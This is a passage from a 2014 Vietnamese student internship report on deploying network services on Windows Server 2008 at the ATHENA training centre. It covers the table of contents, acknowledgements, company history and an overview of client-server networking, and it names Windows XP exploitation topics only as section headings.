1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH
MẠNG QUỐC TẾ
ATHENA
BÁO CÁO THỰC TẬP
NGHIÊN CỨU VÀ TRIỂN KHAI CÁC DỊCH VỤ MẠNG
TRÊN WINDOWS SERVER 2008
Sinh viên thực hiện :Trần Văn Lam
MSSV : 1020096
Lớp : 10DVT
GVHD : Võ Đỗ Thắng
TP. Hồ Chí Minh, Tháng 05 năm 2014.

2. MỤC LỤC
LỜI CẢM ƠN....................................................................................................................................................4
LỜI MỞĐẦU ...................................................................................................................................................6
NHIỆM VỤTHỰC HIỆN ...................................................................................................................................7
Chương I. Công việc thực tập ........................................................................................................................8
1.Giới thiệu doanh nghiệp thực tập – ATHENA.............................................................................................8
1.1 Trụ sởvà các chi nhánh...........................................................................................................9
1.2 Quá trình hình thành và phát triển của trung tâm: ................................................................9
1.3 Cơcấu tổ chức.......................................................................................................................11
1.4 Các sản phẩm, giải pháp .......................................................................................................11
1.5 Khách hàng............................................................................................................................13
1.6 Đối tác ...................................................................................................................................13
1.7 Các nhiệm vụ và dị ch vụ của bộ phận thực tập....................................................................13
2. Thực tập ..................................................................................................................................................13
2.1 Công việc và nhiệm vụ được phân công............................................................................................13
2.2 Thời gian............................................................................................................................................13
Chương II. Nội dung thực tập ......................................................................................................................14
1. Kiến thức tìm hiểu...................................................................................................................................14
1.1. Giải pháp mạng doanh nghiệp.........................................................................................................14
1.1.1. Giới thiệu về mạng doanh nghiệp.............................................................................................14
1.1.2 Các thành phần công nghệ trong mạng doanh nghiệp..............................................................14
2. Windows Server 2008.............................................................................................................................14
2.1 Giới thiệu về mô hình Client-Server..................................................................................................14
2.2. Giới thiệu về Windows Server 2008.................................................................................................16
2.2.1 Nền tảng chắc chắn dành cho doanh nghiệp. ...........................................................................16
2.2.2 Được xây dựng phục vụ Web......................................................................................................18
2.2.3 Bảo mật cao ...............................................................................................................................18
2.3. Các công nghệ được tiếp xúc, quá trình làm việc và các kiến thức..................................................19
2.3.1 Làm việc với Windows Server 2008 trên môi trường máy ảo VMWare.....................................19
2.3.1.1 Cài đặt và cấu hình máy chủ Windows Server 2008...........................................................20

3. 2.3.1.2 Các bước cài đặt Windows Server 2008 (trên máy ảo VMware Workstation) ...................20
2.3.1.3 Khởi tạo cấu hình lần đầu tiên cho Windows Server 2008.................................................27
Cài đặt Server Manager.......................................................................................................28
2.3.1.3.1.Các thành phần trong Server Manager.........................................................................29
2.3.1.3.2 DNS...............................................................................................................................36
2.3.1.3.3 DHCP ............................................................................................................................45
2.3.1.3.4 Web Server IIS..............................................................................................................57
2.3.1.3.5 Mail Server...................................................................................................................62
2.3.1.3.6 VPN...............................................................................................................................74
2.3.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS (Virtual private server)................83
2.3.2.1 VPN thông qua máy chủ ảo VPS..........................................................................................85
2.3.2.2 Mail Server thông qua máy chủ ảo VPS. ............................................................................95
2.3.2.3 Web Server thông qua máy chủ ảo VPS...........................................................................104
2.3.3 Bảo mật Window .....................................................................................................................116
2.3.3.1 Khai thác lỗ hổng bảo mật trên Windows XP với mã lỗi MS10_042...............................116
2.3.3.2 Khai thác lỗ hổng bảo mật trên Window XP với mã lỗi MS12_027 ................................120
2.3.3.3 Khai thác lỗ hổng bảo mật trên Window XP với lỗi Adobe Reader 9.X ..........................124
2.3.3.4 Khai thác lỗ hổng bảo mật trên Windows XP với mã lỗi MS12_004...............................127
2.4 Các kết quả đạt được......................................................................................................................131
2.4.1 Kinh nghiệm thực tế.................................................................................................................131
2.4.2 Hoàn thiện bản thân .................................................................................................................131
2.4.3 Các kiến thức được lĩnh hội.....................................................................................................131
Chương III. Kết Luận..................................................................................................................................132
TÀI LIỆU THAM KHẢO................................................................................................................................133

4. LỜI CẢM ƠN
Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ trợ,
giúp đỡ dù ít hay nhiều, dù trực tiếp hay gián tiếp của người khác. Trong suốt thời
gian từ khi bắt đầu học tập ở giảng đường đến nay, em đã nhận được rất nhiều sự
quan tâm, giúp đỡ của quý Thầy Cô, gia đình và bạn bè. Với lời biết ơn sâu sắc
nhất, em xin gửi đến quý Thầy Cô trong khoa Điện tử - Viễn thông,Trường ĐH
Khoa Học Tự Nhiên đã cùng với tri thức và tâm huyết của mình để truyền đạt vốn
kiến thức quý báu cho chúng em trong suốt thời gian học tập tại trường. Và đặc
biệt, trong học kỳ này Khoa đã tổ chức cho chúng em thực tập và được tiếp cận với
môn học mà theo em là rất hữu ích đối với sinh viên ngành Điện tử - Viễn thông.
Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã tận tâm hướng dẫn chúng em
qua từng buổi thực tập tại Trung Tâm ATHENA cũng như những buổi nói chuyện,
thảo luận.Nếu không có những lời hướng dẫn, dạy bảo của thầy thầy thì em nghĩ
bài báo cáo này của em rất khó có thể hoàn thiện được.Một lần nữa, em xin chân
thành cảm ơn thầy.
Bài báo cáo được thực hiện trong khoảng thời gian gần 2 tháng.Bước đầu đi vào
thực tế, tìm hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do vậy,
không tránh khỏi những thiếu sót là điều chắc chắn, em rất mong nhận được những
ý kiến đóng góp quý báu của quý Thầy Cô và các bạn học cùng lớp để kiến thức
của em trong lĩnh vực này được hoàn thiện hơn.
Sau cùng, em xin kính chúc quý Thầy Cô trong Khoa Điện tử -Viễn thông và Thầy
Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao
đẹp của mình là truyền đạt kiến thức cho thế hệ mai sau
Trân trọng !
Tp.Hồ Chí Minh,Ngày 05/05/2014
Sinh viên thực hiện
Trần Văn Lam

5. NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN THỰC TẬP
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
……………………………………………………………………………………….
GVHD Sinh viên thực hiện
(Ký và ghi họ tên) Trần Văn Lam

6. LỜI MỞĐẦU
Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên phổ biến với
mọi người. Chúng mang lại cho con người khả năng to lớn và làm những công việc
phi thường: tính toán nhanh và chính xác các bài toán phức tạp, điều khiển tự động,
giải trí… Máy tính ra đời không chỉ hỗ trợ trong sản xuất mà còn trong việc học
tập và làm góp phần giải phóng sức lao động. Máy tính điện tử là một phát minh,
thành tựu to lớn cho sự phát triển của nhân loại góp phần thúc đẩy mạnh mẽ tiến
bộ khoa học và kỹ thuật nói riêng cũng như nhân loại nói chung.
Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công nghệ thông tin
thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời.Sức mạnh máy tính
có thể nhân lên gấp nhiều lần khi được kết nối thành mạng máy tính. Với mạng
máy tính toàn cầu chúng ta dễ dàng tiếp cận với sự phát triển của thế giới trong đó
có sự phát triển gần nhất của Windows Server là Windows Server 2000 và
Windows Server 2003 và tiếp đến là Windows Server 2008 hỗ trợ tốt các dịch vụ
mạng cần thiết trên Server, việc cải tiến không ngừng giúp nâng cao tính ổn định
và an toàn hơn cho Windows Server 2008 hoạt động một cách trơn tru.
Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ trương hàng
đầu của nhà nước.Mạng máy tính trở thành mục tiêu nghiên cứu và phát triển. Cốt
lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ kiến trúc mạng đến
nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v…Mạng viễn thông nói chung và
mạng máy tính trên nền tảng Windows Server 2008 nói riêng là công cụ hũu dụng
không thể thiếu trong bộ máy nhà nước, trường học, doanh nghiệp…Nó đóng vai
trò cầu nối trao đổi thông tin giữa các chính phủ, tổ chức xã hội và mọi người với
nhau.
Quá trình thực tập tại Trung tâm ATHENA giúp em có những trải nghiệm vô cùng
thú vị và bổ ích.Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng
một mạng máy tính thân thiện, thông minh cho mọi người sử dụng. Tuy đã có
nhiều cố gắng song không thể tránh những khuyết điểm, sai sót vì thế mong được
sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn bè, bạn đọc,
người thân để em có thể ngày một hoàn thiện bản thân mình hơn.
Em xin chân thành cảm ơn!

7. NHIỆM VỤ THỰC HIỆN
Họ tên SV : Trần Văn Lam
MSSV: 1020096.
Chuyên ngành: Viễn thông – Mạng
Khoa :Điện Tử - Viễn Thông
Trường : ĐH Khoa Học Tự Nhiên Tp.HCM
Tên đề tài: Nghiên cứu triển khai các dịch vụ mạng trênWindows Server 2008.
Nội dung thực hiện:
Lý thuyết:
Nắmvữngcác bước thực hiện quản trị Windows Server 2008.Có khả năng tự thiết
lập một mạng máy tính, cấu hình mạng, điều chỉnh khả năng hoạt động mạng máy
tính, vận hành hệ thống mạng, giải quyết sự cố, các phương pháp bảo vệ trước
nguy cơ virus, worm, trojan, spam.
Thực hành:
Cài đặt Windows Server 2008.
Nâng cấp Stand Alone thành Domain controller.
Cài đặt Windows 7. Join Domain cho windows 7.
Backup cho Domain Controller.
Quản lý dịch vụ DNS, Mail, DHCP, Web, VPN trên môi trường Local và Internet.
Thực hiện kết nối VPN, Mail Server, Web Server trên máy chủ ảo VPS.
Bảo mật Windows với khai thác các mã lỗi trên Windows Xp là
MS10_042,MS12_004,MS12_027 và lỗi Adobe Reader9.X

8. Chương I. Công việc thực tập
1.Giới thiệu doanh nghiệp thực tập – ATHENA
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền thân là
Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là
TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh
doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11
năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết
và kinh nghiệm trong lĩnh vực CNTT.Với quyết tâm góp phần vào công cuộc thúc đẩy
tiến trình tin học hóa của nước nhà. ATHENA đã và đang tập trung chủ yếu vào các họat
động sau:
 Đào tạo chuyên sâu Quản trị mạng, An ninh mạng, Thương mại điện tử theo các
tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI
CEH,..Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao
cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công
An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó
cung cấp nguồn nhân lực trong lĩnh vực CNTT, đặc biệt là chuyên gia về mạng
máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có
nhu cầu.
 Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản
xuất kinh doanh.
 Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở
dữ liệu thông tin về các ứng dụng và sự cố mạng.
 Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy
ra sự cố máy tính.
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên
gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như
Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền
Thông các tỉnh, Bưu điện các tỉnh-thành

9. Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ
với nhiều đại học lớn như Đại học Bách Khoa Thành Phố Hồ Chí Minh, HọcViệnAn
Ninh Nhân Dân (Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin
(VNISA), Viện Kỹ Thuật Quân Sự..
1.1 Trụ sở và các chi nhánh
1.1.1 Trụ sở chính:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao,Quận 1,Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8) 3824 4041
Hotline: 0943 23 00 99
1.1.2 Cơ sở 2_Tại TP Hồ Chí Minh
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.athena.edu.vn
Điện thoại: (84-8) 2210 3801
Hotline: 0943 20 00 88
1.2 Quá trình hình thành và phát triển của trung tâm:
Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực
CNTT đã nhận ra tiềm năng phát triển của việc đào tạo nền CNTT nước nhà. Họ là
những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa
về tương lai của ngành CNTT, họ đã quy tụ được một lực lượng lớn đội ngũ CNTT trước
hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu.
Các thành viên sáng lập trung tâm gồm:
 Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện
tại là giám đốc dự án của công ty Siemen Telecom.
 Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó
Tổng công ty FPT.
 Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách
nhiệm công nghệ thông tin của Ngân hàng.
 Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh
mạng Athena.

10.  Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính
gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính
miền Nam
 Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung
tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài
đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp
về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử,
bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học.
Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ
giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về CNTT của đất
nước nói chung, các doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng
hoạt động cung cấp giải pháp, dịch vụ cho khu vực miền Trung thông qua việc
thành lập văn phòng đại diện tại Đà Nẵng.
 Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm
một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ
giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và học
viện CNTT uy tín trên toàn quốc, đồng thời trong thời gian này Athena có nhiều
chính sách ưu đãi nhằm thu hút đội ngũ nhân lực CNTT lành nghề từ các doanh
nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của trung tâm.
 Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc
lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào
nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn
khỏi công ty gây nên sự hoang mang cho toàn bộ hệ thống trung tâm. Cộng thêm
chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng
cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết
tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin
học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên
làm giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa
chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với
quyết tâm mạnh mẽ và một tinh thần thép đãgiúp ông Thắng vượt qua nhiều khó
khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng
 Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm
đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động
của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo
quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ
chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân
lực,từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà.

11. 1.3 Cơ cấu tổ chức
Hình 1.1 Sơ đồ tổ chức công ty
1.4 Các sản phẩm, giải pháp
1.4.1 Các khóa học dài hạn:
 Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security
specialist.
 Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician.
 Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator
1.4.2 Các khóa học ngắn hạn:
1.4.2.1 Khóa Quản trị mạng :
 Quản trị Mạng Microsoft căn bản ACBN
 Phần cứng máy tính, laptop, server
 Quản trị Hệ thống mạng Microsoft MCSA Security.
 Quản trị Mạng Microsoft nâng cao MCSE

12.  Quản trị Window Vista
 Quản trị Hệ thống Window Server 2008, 2012
 Lớp Master Exchange Mail Server
 Quản trị Mạng quốc tế Cissco CCNA
 Quản trị Hệ thống mạng Linux 1 và Linux 2.
1.4.2.2 Khóa thiết kế web và bảo mật mạng
 Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart
 Lập trình web với Php và MySQL
 Bảo mật mạng quốc tế ACNS
 Hacker mũ trắng
 Athena Mastering Firewall Security
 Bảo mật website
1.4.3 Các sản phẩm khác
 Chuyên đề Thực hành sao lưu và phục hồi dữ liệu
 Chuyên đề Thực hành bảo mật mạng Wi-Fi
 Chuyên đề Ghost qua mạng
 Chuyên đề Xây dựng và quản trị diễn đàn
 Chuyên đề Bảo mật dữ liệu phòng chống nội gián
 Chuyên đề Quản lý tài sản công nghệ thông tin
 Chuyên đề Kỹ năng thương mại điện tử.
1.4.4 Cơ sở hạ tầng
 Thiết bị đầy đủ và hiện đại.
 Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công
nghệ mới nhất
 Phòng máy rộng rãi, thoáng mát.
1.4.5 Các dị ch vụ hỗ trợ:
 Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
 Giới thiệu việc làm cho mọi học viên
 Thực tập có lương cho học viên khá giỏi
 Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn
thời gian
 Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính,
mạng máy tính, bảo mật mạng
 Hỗ trợ thi Chứng chỉ Quốc tế

13. 1.5 Khách hàng
 Mọi đối tượng chuyên hoặc không chuyên về CNTT.
 Khách hàng chủ yếu của ATHENAlà các bạn học sinh, sinh viên và các cán bộ
công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
1.6 Đối tác
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự CNTT,
quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các đơn vị như ngân
hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính...
1.7 Các nhiệm vụ và dị ch vụ của bộ phận thực tập
Bộ phận thực tập :Bộ phận triển khai kỹ thuật.
Nhiệm vụ và dịch vụ:
 Triển khai lắp đặt hệ thống mạng
 Bảo trì hệ thống mạng
 Tư vấn hỗ trợ quản trị hệ thống mạng.
2. Thực tập
2.1 Công việc và nhiệm vụ được phân công
Yêu cầu nhiệm vụ: Có kiến thức tốt về Network, System, Security
 Nghiên cứu các dịch vụ mạng trên Windows Server 2008
 Triển khai các dịch vụ mạng trên Windows Server 2008.
 Triển khai các dịnh vụ mạng trên máy chủ ảo VPS
 Khai thác lỗ hổng bảo mật Window XP
2.2 Thời gian
Từ ngày 06/03/2014 đến ngày 06/05/2014

14. Chương II. Nội dung thực tập
Nhiệm vụ được giao
Nghiên cứu các dịch vụ mạng trên Windows Server 2008
Triển khai các dịch vụ mạng trên Windows Server 2008
1. Kiến thức tìm hiểu
1.1. Giải pháp mạng doanh nghiệp
1.1.1. Giới thiệu về mạng doanh nghiệp
Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô và loại hình
của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất nhiều sự chọn lựa cho doanh
nghiệp như cho phép doanh nghiệp tự trang bị, tự quản lý hoặc sử dụng dịch vụ.Những
doanh nghiệp lớn với hàng ngàn máy tính cũng có những giải pháp quản lý đặc thù kết
hợp cả phần cứng và phần mềm.Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các
ứng dụng công nghệ thông tin (CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có
những nhu cầu khác nhau về quản trị hệ thống mạng (network) của doanh nghiệp. Một hệ
thống được kiểm soát tốt sẽ làm giảm đáng kể chi phí hoạt động, nâng cao hiệu quả cũng
như độ tin cậy của hệ thống.
1.1.2 Các thành phần công nghệ trong mạng doanh nghiệp
Tùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp công nghệ và
thiết kế sao cho phù hợp nhất. Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều
tài nguyên của hệ thống và băng thông mạng, cũng như các yêu cầu về điều khiển, giám
sát mạng. Vậy làm thế nào để một doanh nghiệp vừa và nhỏ, với một số vốn đầu tư ban
đầu hạn chế, có thể tiếp cận được với các công nghệ hiện đại, bắt kịp sự phát triển của thế
giới
2. Windows Server 2008
2.1 Giới thiệu về mô hình Client-Server
Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến việc thực hiện
một mạng lưới client/server.Thay vào đó họ chỉ tiếp tục thêm vào các máy trạm để thực
hiện mô hình mạng peer-to-peer.Mạng peer-to-peer không cung cấp cho bạn nhiều cách
bảo mật và chia sẽ tài nguyên.Vì vậy, không có gì ngạc nhiên khi họ thường có vấn đề
với việc truy cập vào máy trạm, bị mất dữ liệu do virus, spyware hay phải trải nghiệm

15. việc internet bị gián đoạn. Máy tính nối mạng theo mô hình peer-to-peer là đủ khi bạn chỉ
có một vài người dung trên mạng, nhưng khi có nhiều hơn 5 hoặc 6 người sử dụng trên
mạng của bạn, bạn thực sự phải xem xét đầu tư một máy chủ mạng.
Vậy lợi ích của mô hình Client-Server cụ thể là gì?
Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin là an
ninh mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản người dùng cá nhân và
nhóm, có thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu được lưu trữ trên
mạng, ngăn chặn người sử dụng trái phép truy cập tài liệu mà họ không nên xem.
Ví dụ, trong Folder chung thì group ketoan và group nhansu có quyền truy cập của
nhân viên
Cấu hình NTFS Permission:Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều
máy chủ được trang bị nguồn điện dự phòng. Với một nguồn cung cấp năng lượng
thứ cấp chạy song song, sự mất mát của một trong những nguồn cung cấp điện
không ảnh hưởng đến hoạt động hệ thống bình thường. Cũng vậy với hệ thống lưu
trữ của máy chủ. Không giống như một máy tính để bàn trung bình có sử dụng
một ổ cứng duy nhất, một máy chủ sẽ thường sử dụng nhiều ổ đĩa cứng làm việc
trong một RAID cấu hình để ngăn ngừa mất dữ liệu hoặc một sự gián đoạn trong
quy trình làm việc. Ngoài ra, nhiều máy chủ cũng được trang bị ổ đĩa cứng hot
swappable và nguồn cung cấp điện. Các thành phần này có thể thay thế nóng cho
phép bạn thay thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn phòng. Ngoài
ra, kể từ khi tất cả các dữ liệu nhân viên đang được lưu trữ trên mạng, nếu máy
trạm của người dùng không giữa ngày làm việc, nhân viên có thể truy cập các tập
tin tương tự từ máy trạm khác
Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng, tất cả
người dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay từ bàn
làm việc, tăng hiệu quả. Một số trong những nguồn tài nguyên bao gồm:
 Tập trng lưu trữ dữ liệu ( RAID Array )
 Network Attached Storage (NAS) thiết bị o
 Tháp đĩa CD / DVD
 Máy in và máy chủ Fax –
 Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của
bạn là khả năng lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì
vậy, có tốt, cập nhật, phần mềm chống virus được cài đặt trên hệ thống
của bạn là một điều cần thiết. Trong một văn phòng của 10 người hoặc ít
hơn, hệ thống có thể được duy trì riêng. Bất cứ điều gì nhiều hơn thế, tuy
nhiên, có thể trở thành một gánh nặng thực sự. Trong những trường hợp

16. này, một gói phần mềm chống virus kết hợp máy trạm và bảo vệ chống
virus máy chủ vào một giải pháp duy nhất có ý nghĩa hơn.
Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của họ một cách
thường xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên được lưu trữ
tại một địa điểm, bản sao lưu có thể được thực hiện đáng tin cậy và nhanh chóng.
Vì vậy, bạn sẽ không bao giờ cần phải lo lắng về những dữ liệu được lưu trữ trên
những gì máy trạm như bạn làm trong một mạng peer-to-peer. Ngày nay, hầu hết
các loại phương tiện truyền thông có thể được sử dụng cho mục đích sao lưu.
Ngoài các ổ đĩa truyền thống băng, đĩa CD, DVD, lưu trữ và thậm chí loại bỏ
Network Attached Storage (NAS) thiết bị này là chấp nhận được. Sự lựa chọn của
bạn của phương tiện truyền thông sẽ phụ thuộc vào yêu cầu cụ thể của bạn sao lưu.
Tùy thuộc vào ngân sách của bạn và nhu cầu lưu giữ dữ liệu của bạn, bất kỳ trong
số này sẽ là một giải pháp chấp nhận được. Hãy chắc chắn rằng bạn có ít nhất một
bản sao lưu hàng tuần theo lịch trình, mặc dù hàng ngày sẽ tốt hơn.
2.2. Giới thiệu về Windows Server 2008
Window Server 2008 là hệ điều hành Windows Server tân tiến nhất cho tới thời điểm
này, được thiết kế nhằm tăng sức mạnh cho các mạng, ứng dụng và dịch vụ Web thế hệ
mới. Với Windows Server 2008, bạn có thể phát triển, cung cấp và quản lý các trải
nghiệm người dùng và ứng dụng phong phú, đem tới một hạ tầng mạng có tính bảo mật
cao, và tăng cường hiệu quả về mặt công nghệ và giá trị trong phạm vi tổ chức của mình.
Windows Server 2008 kế thừa những thành công và thế mạnh của các hệ điều hành
Windows Server thế hệ trước, đồng thời đem tới tính năng mới có giá trị và những cải
tiến mạnh mẽ cho hệ điều hành cơ sở này. Công cụ Web mới, công nghệ ảo hóa, tính bảo
mật tăng cường và các tiện ích quản lý giúp tiết kiệm thời gian, giảm bớt các chi phí, và
đem tới một nền tảng vững chắc cho hạ tầng Công nghệ Thông tin (CNTT) của bạn.
2.2.1 Nền tảng chắc chắn dành cho doanh nghiệp.
Windows Server 2008 đem tới một nền tảng chắc chắn đáp ứng tất cả các yêu cầu về ứng
dụng và chế độ làm việc cho máy chủ, đồng thời dễ triển khai và quản lý. Thành phần
mới Server Manager cung cấp một console quản lý hợp nhất, đơn giản hóa và sắp xếp
một cách hợp lý việc cài đặt, cấu hình và quản lý liên tục cho máy chủ. Windows
PowerShell, một shell mới kiểu dòng lệnh, giúp quản trị viên tự động hóa các tác vụ
thường trình về quản trị hệ thống trên nhiều máy chủ. Windows Deployment Services
đem tới một phương tiện bảo mật cao, đơn giản hóa để nhanh chóng triển khai hệ điều
hành này qua các bước cài đặt trên nền mạng.Thêm vào đó, các wizard Failover
Clustering của Windows Server 2008, và việc hỗ trợ đầy đủ cho Giao thức Internet phiên
bản 6 (gọi tắt là IPv6) cộng với khả năng quản lý hợp nhất Network Load Balancing

17. khiến dễ dàng triển khai với tính sẵn có cao, thậm chí bởi những người có hiểu biết chung
nhất về CNTT. Tùy chọn cài đặt mới Server Core của Windows Server 2008 cho phép cài
đặt các vai trò máy chủ chỉ với những thành phần và hệ thống phụ cần thiết mà không cần
giao diện người dùng. Việc có ít hơn các vai trò và đặc tính đồng nghĩa với việc giảm
thiểu công việc cho ổ đĩa và dịch vụ, đồng thời giảm bớt các bề mặt tấn công.
Sản phẩm cũng cho phép nhân viên CNTT xây dựng đặc tả tùy theo các vai trò máy chủ
cần hỗ trợ. Tích hợp Công nghệ Ảo hóa (Virtualization) Windows Server Hyper-V, công
nghệ ảo hóa thế hệ kế tiếp dành cho máy chủ trên nền hypervisor, cho phép tận dụng tối
đa các khoản đầu tư vào phần cứng máy chủ bằng cách hợp nhất nhiều vai trò máy chủ
